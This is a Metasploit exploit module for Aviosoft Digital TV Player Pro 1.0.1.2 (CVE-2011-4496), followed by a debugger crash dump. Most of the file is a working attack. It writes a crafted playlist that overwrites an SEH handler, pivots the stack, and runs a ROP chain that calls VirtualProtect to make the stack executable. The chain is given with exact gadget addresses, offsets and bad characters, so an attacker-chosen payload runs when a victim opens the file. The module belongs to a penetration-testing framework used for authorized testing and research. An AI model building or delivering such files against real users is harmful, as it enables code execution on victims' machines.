GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/fileformat/aviosoft_plf_buf.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
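class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::FILEFORMAT

  # File-format exploit for Aviosoft Digital TV Player Pro 1.0.1.2 (CVE-2011-4496).
  #
  # A crafted .plf playlist overflows a stack buffer while the player copies the
  # file contents. The SEH handler pointer is overwritten with a stack pivot
  # (ADD ESP,800 # RET in DTVDeviceManager.dll) that lands on a ROP chain; per the
  # gadget annotations in #rop_chain, the chain sets up a VirtualProtect call to
  # make the stack executable before the payload runs. The victim must open the
  # generated playlist in the vulnerable player; no network interaction occurs.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => "Aviosoft Digital TV Player Professional 1.0 Stack Buffer Overflow",
        'Description' => %q{
          This module exploits a vulnerability found in Aviosoft Digital TV Player
          Pro version 1.x. An overflow occurs when the process copies the content of a
          playlist file on to the stack, which may result arbitrary code execution under
          the context of the user.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'modpr0be', # Initial discovery, poc
          'sinn3r', # Metasploit
        ],
        'References' => [
          ['CVE', '2011-4496'],
          ['OSVDB', '77043'],
          ['EDB', '18096'],
        ],
        'Payload' => {
          # \x00, \x0a, \x1a: presumably bytes the playlist parser treats as
          # terminators (NUL, LF, EOF) -- not re-verified here.
          'BadChars' => "\x00\x0a\x1a",
          # Move ESP below the payload so its own pushes do not clobber it.
          'StackAdjustment' => -3500,
          # NOTE(review): no 'Space' is declared, so the framework does not bound
          # the encoded payload size; #exploit enforces target['Max'] instead.
        },
        'DefaultOptions' => {
          'EXITFUNC' => "seh",
        },
        'Platform' => 'win',
        'Targets' => [
          [
            'Aviosoft DTV Player 1.0.1.2',
            {
              'Ret' => 0x6130534a, # Stack pivot (ADD ESP,800; RET) in DTVDeviceManager.dll
              'Offset' => 612, # Offset to SEH
              'Max' => 5000 # Max buffer size
            }
          ],
        ],
        'Privileged' => false,
        'DisclosureDate' => '2011-11-09',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('FILENAME', [false, 'The playlist name', 'msf.plf'])
      ]
    )
  end

  # Filler dwords for ROP slots whose value is never used (registers a gadget
  # pops as a side effect, or bytes discarded by a RETN n). Random alphanumeric
  # bytes keep the filler free of the declared bad characters.
  #
  # @param n [Integer] number of filler dwords
  # @return [Array<Integer>] n copies of one random 32-bit value
  def junk(n = 1)
    # "L" is native-endian; the value is random so byte order is irrelevant,
    # it is only repacked little-endian by the caller.
    [rand_text_alpha(4).unpack("L")[0]] * n
  end

  # NOP-equivalent dwords for the chain.
  #
  # @param rop [Boolean] true => ROP NOP (address of a bare RETN gadget),
  #   false => four 0x90 bytes packed as one dword
  # @param n [Integer] number of dwords
  # @return [Array<Integer>]
  def nops(rop = false, n = 1)
    rop ? [0x61326003] * n : [0x90909090] * n
  end

  # The ROP chain as packed little-endian dwords.
  #
  # Reading the gadget annotations, this is the usual PUSHAD-driven
  # VirtualProtect call: ESI <- VirtualProtect (read through the IAT pointer
  # 0x10011108), EBP <- "push esp # ret" so execution continues on the stack
  # after the call, EBX <- 0x343 (dwSize), EDX <- 0x40 (PAGE_EXECUTE_READWRITE),
  # ECX <- a writable dword for lpflOldProtect, EDI <- ROP NOP, EAX <- NOPs, and
  # the final gadget (presumably PUSHAD # RETN) dispatches the call. Several
  # annotations are abbreviated (e.g. the MOV ECX gadget lists only one POP but
  # is followed by three junk dwords), so confirm the exact stack accounting in
  # a debugger before touching any slot. All addresses are specific to the DLL
  # builds shipped with 1.0.1.2.
  #
  # @return [String] the chain, ready to append to the file buffer
  def rop_chain
    [
      nops(true, 10), # ROP NOP
      0x6405347a, # POP EDX # RETN (MediaPlayerCtrl.dll)
      0x10011108, # ptr to &VirtualProtect
      0x64010503, # PUSH EDX # POP EAX # POP ESI # RETN (MediaPlayerCtrl.dll)
      junk,
      0x6160949f, # MOV ECX,DWORD PTR DS:[EDX] # POP ESI (EPG.dll)
      junk(3),
      0x61604218, # PUSH ECX # ADD AL,5F # XOR EAX,EAX # POP ESI # RETN 0C (EPG.dll)
      junk(3),
      0x6403d1a6, # POP EBP # RETN (MediaPlayerCtrl.dll)
      junk(3),
      0x60333560, # & push esp # ret 0c (Configuration.dll)
      0x61323EA8, # POP EAX # RETN (DTVDeviceManager.dll)
      0xA13977DF, # 0x00000343-> ebx
      0x640203fc, # ADD EAX,5EC68B64 # RETN (MediaPlayerCtrl.dll)
      0x6163d37b, # PUSH EAX # ADD AL,5E # POP EBX # RETN (EPG.dll)
      0x61626807, # XOR EAX,EAX # RETN (EPG.dll)
      0x640203fc, # ADD EAX,5EC68B64 # RETN (MediaPlayerCtrl.dll)
      0x6405347a, # POP EDX # RETN (MediaPlayerCtrl.dll)
      0xA13974DC, # 0x00000040-> edx
      0x613107fb, # ADD EDX,EAX # MOV EAX,EDX # RETN (DTVDeviceManager.dll)
      0x60326803, # POP ECX # RETN (Configuration.dll)
      0x60350340, # &Writable location
      0x61329e07, # POP EDI # RETN (DTVDeviceManager.dll)
      nops(true), # ROP NOP
      0x60340178, # POP EAX # RETN
      nops, # Regular NOPs
      0x60322e02 # PUSH # RETN
    ].flatten.pack("V*")
  end

  # Builds the malicious playlist and writes it to FILENAME.
  #
  # File layout:
  #   [Offset bytes filler][SEH handler = pivot][136 bytes][ROP chain][32 NOPs][payload][pad to Max]
  #
  # The 136 random bytes after the handler are presumably the part of the frame
  # the ADD ESP,800 pivot steps over before ESP reaches the chain.
  #
  # @raise [Msf::Exploit::Failed] via fail_with when the selected payload does
  #   not fit inside target['Max'] bytes
  def exploit
    buf = ''
    buf << rand_text_alpha(target['Offset'] - buf.length)
    buf << [target.ret].pack('V*')
    buf << rand_text_alpha(136)
    buf << rop_chain
    buf << make_nops(32)
    buf << payload.encoded

    # Nothing upstream bounds the payload size (no 'Space' in the metadata).
    # Without this check an oversized payload would silently yield a file
    # longer than the tested maximum, since the padding below would be empty.
    if buf.length > target['Max']
      fail_with(Failure::BadConfig, "Buffer is #{buf.length} bytes, exceeds target max of #{target['Max']}; choose a smaller payload")
    end
    buf << rand_text_alpha(target['Max'] - buf.length)

    file_create(buf)
  end
end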
=begin
eax=00001779 ebx=047a02c0 ecx=000001f4 edx=047a6814 esi=047a77bc edi=00130000
eip=6400f6f0 esp=0012f038 ebp=00000001 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
MediaPlayerCtrl!DllCreateObject+0x220:
6400f6f0 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
0:000> !exchain
0012f3bc: *** WARNING: Unable to verify checksum for C:\Program Files\Aviosoft\Aviosoft DTV Player Pro\DTVDeviceManager.dll
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Aviosoft\Aviosoft DTV Player Pro\DTVDeviceManager.dll -
DTVDeviceManager+534a (6130534a)
Invalid exception stack at 41414141
0:000> !address edi
00130000 : 00130000 - 00003000
Type 00040000 MEM_MAPPED
Protect 00000002 PAGE_READONLY
State 00001000 MEM_COMMIT
Usage RegionUsageIsVAD
0:000> !address esi
047a0000 : 047a0000 - 0000b000
Type 00020000 MEM_PRIVATE
Protect 00000004 PAGE_READWRITE
State 00001000 MEM_COMMIT
Usage RegionUsageHeap
Handle 013c0000
=end